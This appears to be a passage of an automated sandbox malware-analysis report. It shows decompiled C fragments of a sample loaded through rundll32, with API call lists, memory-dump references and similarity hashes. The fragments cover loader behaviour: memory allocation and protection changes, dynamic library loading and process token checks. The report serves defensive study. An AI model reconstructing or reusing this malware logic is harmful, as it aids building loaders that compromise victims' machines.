                                                                      					__eflags =  *((intOrPtr*)(_t24 + 0x101c)) - 1;
                                                                      					if( *((intOrPtr*)(_t24 + 0x101c)) == 1) {
                                                                      						__imp__CoInitializeEx(0, 6, __edi);
                                                                      						_t30 =  *0x4960fd8; // 0x49ffc50
                                                                      						_push(0);
                                                                      						_push(0x495d9b8);
                                                                      						_t31 = _t30 + 0x228;
                                                                      						__eflags = _t31;
                                                                      						_push(_t31);
                                                                      						_t56 = E04949924(0x495d9b8);
                                                                      						_t62 = E049416EC(0x495d9b8, 0x2a);
                                                                      						_v8 = _t62;
                                                                      						while(1) {
                                                                      							_t52 =  *0x4960fd8; // 0x49ffc50
                                                                      							_t34 =  *0x4960fc0; // 0x49ffa38
                                                                      							_t36 =  *0x4960fb4; // 0x49ffc18
                                                                      							_t37 =  *_t36( *((intOrPtr*)(_t34 + 0x54))(_t62, _t52 + 0x1644, _t56, 0, 0));
                                                                      							__eflags = _t37 - 5;
                                                                      							if(_t37 != 5) {
                                                                      								break;
                                                                      							}
                                                                      							Sleep(0x7d0);
                                                                      						}
                                                                      						E04949D66( &_v8);
                                                                      						_t40 =  *0x4960fa0; // 0x49ff8a0
                                                                      						_pop(_t50);
                                                                      						 *((intOrPtr*)(_t40 + 0xec))(0);
                                                                      						_t24 =  *0x4960fd8; // 0x49ffc50
                                                                      						_t60 = 1;
                                                                      						__eflags = 1;
                                                                      					}
                                                                      					__eflags =  *(_t24 + 0x1898) & 0x00010082;
                                                                      					if(( *(_t24 + 0x1898) & 0x00010082) != 0) {
                                                                      						L13:
                                                                      						 *((intOrPtr*)(_t24 + 0xa4)) = _t60;
                                                                      						_t25 =  *0x4960fd8; // 0x49ffc50
                                                                      						__eflags =  *((intOrPtr*)(_t25 + 0x214)) - 3;
                                                                      						if(__eflags != 0) {
                                                                      							goto L15;
                                                                      						} else {
                                                                      							goto L14;
                                                                      						}
                                                                      					} else {
                                                                      						_t14 = _t24 + 0x224; // 0x4940000
                                                                      						_t54 =  *_t14;
                                                                      						_t29 = E0494A664( *_t14); // executed
                                                                      						__eflags = _t29;
                                                                      						_t24 =  *0x4960fd8; // 0x49ffc50
                                                                      						_t50 = _t50;
                                                                      						if(_t29 == 0) {
                                                                      							goto L13;
                                                                      						} else {
                                                                      							__eflags =  *((intOrPtr*)(_t24 + 0x214)) - 3;
                                                                      							if( *((intOrPtr*)(_t24 + 0x214)) == 3) {
                                                                      								L14:
                                                                      								__eflags = E049429DD();
                                                                      								if(__eflags < 0) {
                                                                      									L15:
                                                                      									E049412F8(_t50, _t54, __eflags, _t68);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					_t27 = 0;
                                                                      					__eflags = 0;
                                                                      				} else {
                                                                      					_t27 = _t22 + 1;
                                                                      				}
                                                                      				return _t27;
                                                                      			}
























                                                                      APIs
                                                                      • CoInitializeEx.OLE32(00000000,00000006,?,?,?,?,?,04941005), ref: 049414FE
                                                                      • Sleep.KERNEL32(000007D0), ref: 04941558
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeSleep
                                                                      • String ID:
                                                                      • API String ID: 4203272843-0
                                                                      • Opcode ID: fb5830d752b724463debea00de6989d43687b48a76231b6d355a994343edf9c7
                                                                      • Instruction ID: f74ff9105cac5f2aa3a0890b712cc3fa694b34065e16d20aeffad915978a41ed
                                                                      • Opcode Fuzzy Hash: fb5830d752b724463debea00de6989d43687b48a76231b6d355a994343edf9c7
                                                                      • Instruction Fuzzy Hash: D731A2B1644200EFE710EFB4D98EEA67BECEBC5354F154479E50297180EA78FD818B60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E04949491(void* __edx, intOrPtr _a4) {
                                                                      				char _v8;
                                                                      				void* __ecx;
                                                                      				char _t5;
                                                                      				struct HINSTANCE__* _t7;
                                                                      				void* _t11;
                                                                      				void* _t13;
                                                                      				void* _t15;
                                                                      				void* _t23;
                                                                      				void* _t26;
                                                                      
                                                                      				_push(_t15);
                                                                      				_t23 = __edx;
                                                                      				_t13 = _t15;
                                                                      				_t5 = E049490CA(_t15, _a4);
                                                                      				_t26 = 0;
                                                                      				_v8 = _t5;
                                                                      				_push(_t5);
                                                                      				if(_a4 != 0x26e) {
                                                                      					_t7 = LoadLibraryA(); // executed
                                                                      				} else {
                                                                      					_t7 = GetModuleHandleA();
                                                                      				}
                                                                      				if(_t7 != 0) {
                                                                      					_t11 = E04949446(_t13, _t23, _t7); // executed
                                                                      					_t26 = _t11;
                                                                      				}
                                                                      				E04949D4C( &_v8);
                                                                      				return _t26;
                                                                      			}













                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(00000000,?,?,?,0495D870,?,049415E8,0000026E,0494149D,?,?,04941005), ref: 049494B4
                                                                      • LoadLibraryA.KERNELBASE(00000000,?,?,?,0495D870,?,049415E8,0000026E,0494149D,?,?,04941005), ref: 049494C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLibraryLoadModule
                                                                      • String ID:
                                                                      • API String ID: 4133054770-0
                                                                      • Opcode ID: 19d03a970dd3028eaec723776eb36133ce76ebf61a8de3b725b43f84d8068dbc
                                                                      • Instruction ID: 271ec5ca81a6e9b5b9a55bce1172b701ea58e6289ce242c069b6366404dc2572
                                                                      • Opcode Fuzzy Hash: 19d03a970dd3028eaec723776eb36133ce76ebf61a8de3b725b43f84d8068dbc
                                                                      • Instruction Fuzzy Hash: 35F082B2604224AF9B24ABB9E848D5BBBADEBC42A4720453AF405D7250E974ED4086A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E04941000() {
                                                                      				void* _t4;
                                                                      				void* _t5;
                                                                      
                                                                      				E04941494(_t4, _t5);
                                                                      				ExitProcess(0);
                                                                      			}





                                                                      0x04941000
                                                                      0x0494100c

                                                                      APIs
                                                                      • ExitProcess.KERNEL32(00000000), ref: 0494100C
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: 90cfdfae97d7d9870d47f097b73d117653318e72c745724d4daca2451be06c87
                                                                      • Instruction ID: 3bdf6346d19c19ff06352faa393784539cb8b18b6627f3b19a8c35f46d870168
                                                                      • Opcode Fuzzy Hash: 90cfdfae97d7d9870d47f097b73d117653318e72c745724d4daca2451be06c87
                                                                      • Instruction Fuzzy Hash: 97B01230254040CFEB00DB70D44DF6C37D0BB88302F4988B8F105CE045EA605400C710
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(?), ref: 046B051C
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000003.409606495.00000000046B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_3_46b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 647806292e40d76c1808ca0a8b573877cb0d1ed87da1151593330ae6246e7e91
                                                                      • Instruction ID: 73e18194b656cda412f4254860008268f047b32b5983bc99094ad9c023b8f01b
                                                                      • Opcode Fuzzy Hash: 647806292e40d76c1808ca0a8b573877cb0d1ed87da1151593330ae6246e7e91
                                                                      • Instruction Fuzzy Hash: 7D1173A2E4431CEFDB10CA90DDC47EE6AB5EB25345F588065D4865B382F6316DC1A781
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000003.409606495.00000000046B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_3_46b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0092f584a839dd62b4c13f44ce63d536f0c9e1244b20ab5f9c8e56308dbb263e
                                                                      • Instruction ID: bb12c3510d1c5dfcd5571f1b81d161fb12a1ea3d261079b1a7bba27eb40e65b0
                                                                      • Opcode Fuzzy Hash: 0092f584a839dd62b4c13f44ce63d536f0c9e1244b20ab5f9c8e56308dbb263e
                                                                      • Instruction Fuzzy Hash: D131B2B5E44209FBDF10ABA0C8B47EE7674AB16380F840061D982A7352F2357AC1A7D5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 47%
                                                                      			E0494DC83(void* __ecx, void* __esi) {
                                                                      				intOrPtr* _v8;
                                                                      				char _v12;
                                                                      				void* _v16;
                                                                      				char _v20;
                                                                      				char _v24;
                                                                      				short _v28;
                                                                      				char _v32;
                                                                      				void* _t20;
                                                                      				intOrPtr* _t21;
                                                                      				intOrPtr _t29;
                                                                      				intOrPtr _t31;
                                                                      				intOrPtr* _t33;
                                                                      				intOrPtr _t34;
                                                                      				char _t37;
                                                                      				union _TOKEN_INFORMATION_CLASS _t44;
                                                                      				char _t45;
                                                                      				intOrPtr* _t48;
                                                                      
                                                                      				_t37 = 0;
                                                                      				_v28 = 0x500;
                                                                      				_t45 = 0;
                                                                      				_v32 = 0;
                                                                      				_t20 = E0494DB58(__ecx);
                                                                      				_v16 = _t20;
                                                                      				if(_t20 != 0) {
                                                                      					_push( &_v24);
                                                                      					_t44 = 2;
                                                                      					_t21 = E0494DBAF(_t44); // executed
                                                                      					_t48 = _t21;
                                                                      					_v20 = _t48;
                                                                      					if(_t48 == 0) {
                                                                      						L10:
                                                                      						FindCloseChangeNotification(_v16);
                                                                      						if(_t48 != 0) {
                                                                      							E0494913B( &_v20, _t37);
                                                                      						}
                                                                      						return _t45;
                                                                      					}
                                                                      					_push( &_v12);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0x220);
                                                                      					_push(0x20);
                                                                      					_push(2);
                                                                      					_push( &_v32);
                                                                      					_t29 =  *0x4960fc8; // 0x49ffb00
                                                                      					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
                                                                      						goto L10;
                                                                      					}
                                                                      					if( *_t48 <= 0) {
                                                                      						L9:
                                                                      						_t31 =  *0x4960fc8; // 0x49ffb00
                                                                      						 *((intOrPtr*)(_t31 + 0x10))(_v12);
                                                                      						_t37 = 0;
                                                                      						goto L10;
                                                                      					}
                                                                      					_t9 = _t48 + 4; // 0x4
                                                                      					_t33 = _t9;
                                                                      					_v8 = _t33;
                                                                      					while(1) {
                                                                      						_push(_v12);
                                                                      						_push( *_t33);
                                                                      						_t34 =  *0x4960fc8; // 0x49ffb00
                                                                      						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
                                                                      							break;
                                                                      						}
                                                                      						_t37 = _t37 + 1;
                                                                      						_t33 = _v8 + 8;
                                                                      						_v8 = _t33;
                                                                      						if(_t37 <  *_t48) {
                                                                      							continue;
                                                                      						}
                                                                      						goto L9;
                                                                      					}
                                                                      					_t45 = 1;
                                                                      					goto L9;
                                                                      				}
                                                                      				return _t20;
                                                                      			}

                                                                      APIs
                                                                        • Part of subcall function 0494DB58: GetCurrentThread.KERNEL32 ref: 0494DB6B
                                                                        • Part of subcall function 0494DB58: OpenThreadToken.ADVAPI32(00000000,?,?,0494DC9D,00000000,04940000), ref: 0494DB72
                                                                        • Part of subcall function 0494DB58: GetLastError.KERNEL32(?,?,0494DC9D,00000000,04940000), ref: 0494DB79
                                                                        • Part of subcall function 0494DB58: OpenProcessToken.ADVAPI32(00000000,?,?,0494DC9D,00000000,04940000), ref: 0494DB9E
                                                                        • Part of subcall function 0494DBAF: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,04940000,00000000,00000000,?,0494DC30,00000000,00000000,?,0494DC59), ref: 0494DBCA
                                                                        • Part of subcall function 0494DBAF: GetLastError.KERNEL32(?,0494DC30,00000000,00000000,?,0494DC59,00001644,?,0494BBDE), ref: 0494DBD1
                                                                      • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,04940000), ref: 0494DD27
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
                                                                      • String ID:
                                                                      • API String ID: 1806447117-0
                                                                      • Opcode ID: cfdb73bafe4bd61e906b958b38e36c1e60615e87fade55da9f5e3e6bb916cf97
                                                                      • Instruction ID: 63cbdd8797490739f6697983892d5caf3a27a2594b14f2ebdafa4e35d4660f34
                                                                      • Opcode Fuzzy Hash: cfdb73bafe4bd61e906b958b38e36c1e60615e87fade55da9f5e3e6bb916cf97
                                                                      • Instruction Fuzzy Hash: 6D215E76A00209EFDB10DFA9D885EAEBBB8FF88700F50457AE505E7250E770AA41CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetNativeSystemInfo.KERNELBASE(?), ref: 046B07D5
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000003.409606495.00000000046B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_3_46b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: InfoNativeSystem
                                                                      • String ID:
                                                                      • API String ID: 1721193555-0
                                                                      • Opcode ID: 67133743171ce9d8cdc9a07f765dc30c570cf60d44af1830f195452f5f9a1b35
                                                                      • Instruction ID: f9ad0adb733e0abe8c9d1d5826df55a50c240f618ec50b39c590ecf13cac26fb
                                                                      • Opcode Fuzzy Hash: 67133743171ce9d8cdc9a07f765dc30c570cf60d44af1830f195452f5f9a1b35
                                                                      • Instruction Fuzzy Hash: 94011974B09249DFDB54CF94C884AEEBBB4BF04260F009885E492AB252F730B9C1DF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0494DC33(void* __ecx) {
                                                                      				signed int _v8;
                                                                      				intOrPtr _t12;
                                                                      				void* _t13;
                                                                      				void* _t14;
                                                                      				void* _t17;
                                                                      				intOrPtr _t18;
                                                                      				void* _t23;
                                                                      
                                                                      				_v8 = _v8 & 0x00000000;
                                                                      				_t12 =  *0x4960fc8; // 0x49ffb00
                                                                      				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
                                                                      				if(_t13 != 0) {
                                                                      					_t14 = E0494DC1C(); // executed
                                                                      					_t23 = _t14;
                                                                      					if(_t23 != 0) {
                                                                      						FindCloseChangeNotification(_v8);
                                                                      						_t17 = _t23;
                                                                      					} else {
                                                                      						if(_v8 != _t14) {
                                                                      							_t18 =  *0x4960fa0; // 0x49ff8a0
                                                                      							 *((intOrPtr*)(_t18 + 0x34))(_v8);
                                                                      						}
                                                                      						_t17 = 0;
                                                                      					}
                                                                      					return _t17;
                                                                      				} else {
                                                                      					return _t13;
                                                                      				}
                                                                      			}

                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f749291b51cb95b78818a88a21caff338848272a8a3c892ec4ca7fe15cead463
                                                                      • Instruction ID: 1d61875ef936c8756b271c30f838e4bf964b796880afba742ea30f95fb809d52
                                                                      • Opcode Fuzzy Hash: f749291b51cb95b78818a88a21caff338848272a8a3c892ec4ca7fe15cead463
                                                                      • Instruction Fuzzy Hash: F7F01236A41114EFCB10DBA4D945E9E7BA8FB88346F4442B9E501E7150DBB4EE00EBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryA.KERNELBASE(?), ref: 046B0E36
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000003.409606495.00000000046B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_3_46b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: dcb77b7dde468c4429c3eacf2e802b1e328b244cbed8a4ff464840034cf41f56
                                                                      • Instruction ID: 473ed921ddb785224b05d747a76e23e2a1c60f26ebcbbdd311b3731b522f7a38
                                                                      • Opcode Fuzzy Hash: dcb77b7dde468c4429c3eacf2e802b1e328b244cbed8a4ff464840034cf41f56
                                                                      • Instruction Fuzzy Hash: 71F07474A14204CFCB18CB84C594AEEBF71AF08320F595048D4466B351F735A9C2DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000003.409606495.00000000046B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_3_46b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: fdae159f5b63167561a356be9577cc6a5469f915a5d238255440c61cf8b3ecaf
                                                                      • Instruction ID: a784d704d4a0d6b594a7bd1e22657e5f4b41338229b6c64670bc60c59d959c37
                                                                      • Opcode Fuzzy Hash: fdae159f5b63167561a356be9577cc6a5469f915a5d238255440c61cf8b3ecaf
                                                                      • Instruction Fuzzy Hash: D3E01AB1A0520DEACF00CF90D0652FDB7F4AB062D9F204017D482A6100F3346AC2EBC0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,?), ref: 046B0BBB
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000003.409606495.00000000046B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_3_46b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 2efa1e35d57d1254694c6657700579f5ecd92471f7d6fffa99b604cb6f312ba0
                                                                      • Instruction ID: 2e459fbd748d993c7852375d658011caf1c80057c463327483edc3b47c88d0e7
                                                                      • Opcode Fuzzy Hash: 2efa1e35d57d1254694c6657700579f5ecd92471f7d6fffa99b604cb6f312ba0
                                                                      • Instruction Fuzzy Hash: E8E0B6B5A00108EFDB18CB80CD84EFEBB75FB14300F544480E48163250E332AE40AB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0494911F(long _a4) {
                                                                      				void* _t2;
                                                                      				void* _t3;
                                                                      
                                                                      				_t2 =  *0x49610a4;
                                                                      				if(_t2 != 0) {
                                                                      					_t3 = RtlAllocateHeap(_t2, 8, _a4); // executed
                                                                      					return _t3;
                                                                      				} else {
                                                                      					return _t2;
                                                                      				}
                                                                      			}






                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(?,00000008,?,?,04949C58,?,00000144,?,0495D870), ref: 04949133
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 46bdd93756cdb5db50668a00ceeb11219e4f130492b4148bfdb9f7461e054252
                                                                      • Instruction ID: 84edac5a04011dd724199e057b9d4d24f587d0129f615cf28fe04a2023c99440
                                                                      • Opcode Fuzzy Hash: 46bdd93756cdb5db50668a00ceeb11219e4f130492b4148bfdb9f7461e054252
                                                                      • Instruction Fuzzy Hash: E7C08C75284308EBDF101EB8F809E923B9CEB48A59F008025F60CCA041DB3AFC104B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0494910A() {
                                                                      				void* _t1;
                                                                      
                                                                      				_t1 = HeapCreate(0, 0x96000, 0); // executed
                                                                      				 *0x49610a4 = _t1;
                                                                      				return _t1;
                                                                      			}





                                                                      APIs
                                                                      • HeapCreate.KERNELBASE(00000000,00096000,00000000,04941030), ref: 04949113
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHeap
                                                                      • String ID:
                                                                      • API String ID: 10892065-0
                                                                      • Opcode ID: 9d202144473c4fcc4f75ae4bea6b50c447a00e88993732b7fac903260dd8f67a
                                                                      • Instruction ID: bbaaf30fbd028503f8ac6d883f918a799e756e9f007bd17d0dff47e50e52035c
                                                                      • Opcode Fuzzy Hash: 9d202144473c4fcc4f75ae4bea6b50c447a00e88993732b7fac903260dd8f67a
                                                                      • Instruction Fuzzy Hash: 7CB01274689300EADE500B306D07B013D50D740B02F240225F3019C1C0CAB918009608
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,?), ref: 046B0BBB
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000003.409606495.00000000046B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_3_46b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 11959dc47cbe69a1d1983ee25c8494f456e1724cc526d44f32103389f00dccd7
                                                                      • Instruction ID: 86885337a000476ce0a7c7095005435f863793bf347a088e7ce63456f1f7269d
                                                                      • Opcode Fuzzy Hash: 11959dc47cbe69a1d1983ee25c8494f456e1724cc526d44f32103389f00dccd7
                                                                      • Instruction Fuzzy Hash: 42B01221204740C3EF5516505588BFAAF70EB0221CF44C8C4C1CB5044BBB34A98AB7F1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E0494B48B(void* __ecx, intOrPtr _a4, signed int _a8) {
                                                                      				signed int _v8;
                                                                      				intOrPtr _v12;
                                                                      				signed int _t26;
                                                                      				signed int _t28;
                                                                      				signed int* _t36;
                                                                      				signed int* _t39;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_push(__ecx);
                                                                      				_t36 = _a8;
                                                                      				_t28 = _t36[1];
                                                                      				if(_t28 != 0) {
                                                                      					_t39 = _t36[2];
                                                                      					do {
                                                                      						_a8 = _a8 & 0x00000000;
                                                                      						if(_t39[2] > 0) {
                                                                      							_t31 = _t39[3];
                                                                      							_t22 = _a4 + 0x24;
                                                                      							_v12 = _a4 + 0x24;
                                                                      							_v8 = _t39[3];
                                                                      							while(E0494C30F(_t22,  *_t31) != 0) {
                                                                      								_t26 = _a8 + 1;
                                                                      								_t31 = _v8 + 4;
                                                                      								_a8 = _t26;
                                                                      								_t22 = _v12;
                                                                      								_v8 = _v8 + 4;
                                                                      								if(_t26 < _t39[2]) {
                                                                      									continue;
                                                                      								} else {
                                                                      								}
                                                                      								goto L8;
                                                                      							}
                                                                      							 *_t36 =  *_t36 |  *_t39;
                                                                      						}
                                                                      						L8:
                                                                      						_t39 =  &(_t39[4]);
                                                                      						_t28 = _t28 - 1;
                                                                      					} while (_t28 != 0);
                                                                      				}
                                                                      				Sleep(0xa);
                                                                      				return 1;
                                                                      			}










                                                                      APIs
                                                                      • Sleep.KERNELBASE(0000000A), ref: 0494B4F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 80b2864fcd0a5bc6f51640cbc4593d05ca0025714b5da3272ba9ae1df4bf6769
                                                                      • Instruction ID: a711420bb66b9cca3741799e49430b50fffcb77c40f3e71aaf685206d83a853a
                                                                      • Opcode Fuzzy Hash: 80b2864fcd0a5bc6f51640cbc4593d05ca0025714b5da3272ba9ae1df4bf6769
                                                                      • Instruction Fuzzy Hash: 9A111B71A04309EFDB14CFA9D585E99B7E8FB88324F10846AE95A9B340D274F940CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00002F24,?,00002F24), ref: 046B04CD
                                                                      Memory Dump Source
